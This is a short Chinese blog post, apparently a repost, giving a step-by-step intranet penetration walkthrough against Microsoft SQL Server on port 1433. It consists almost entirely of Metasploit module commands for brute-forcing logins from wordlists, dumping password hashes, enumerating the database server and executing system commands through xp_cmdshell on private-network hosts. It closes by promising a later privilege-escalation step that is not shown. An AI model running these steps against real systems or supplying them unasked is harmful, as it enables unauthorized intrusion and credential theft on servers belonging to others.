内网渗透-1433端口渗透过程
作者:互联网
1.在内网环境中收集开放1433端口的服务器:
这个步骤可以参考此篇文章:https://www.cnblogs.com/xiehong/p/12502100.html
2.针对开放1433端口的服务器开始渗透:
2.1利用msf 爆破1433端口:192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login (2)set RHOSTS 192.168.109.139 (3)set USER_FILE /home/xh/shentou/usr_mysql.txt (4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt (5)run
2.2查找/捕获服务器的口令
(1)use auxiliary/scanner/mssql/mssql_hashdump (2)set RHOSTS 192.168.10.251 (3)set PASSWORD 123456 (4)run
2.3浏览MSSQL
(1)use auxiliary/admin/mssql/mssql_enum (2)set RHOSTS 192.168.10.236 (3)set PASSWORD 123456 (4)run
2.4重新载入xp_cmd功能
(1)use auxiliary/admin/mssql/mssql_exec (2)set CMD 'ipconfig' (3)set RHOSTS 192.168.10.251 (4)set PASSWORD 123456 (5)run
3.后面是利用SA用户进行系统提权,目前还没有操作,待续 ......
标签:use,set,run,1433,渗透,端口,192.168,mssql,RHOSTS 来源: https://www.cnblogs.com/xiehong/p/12720936.html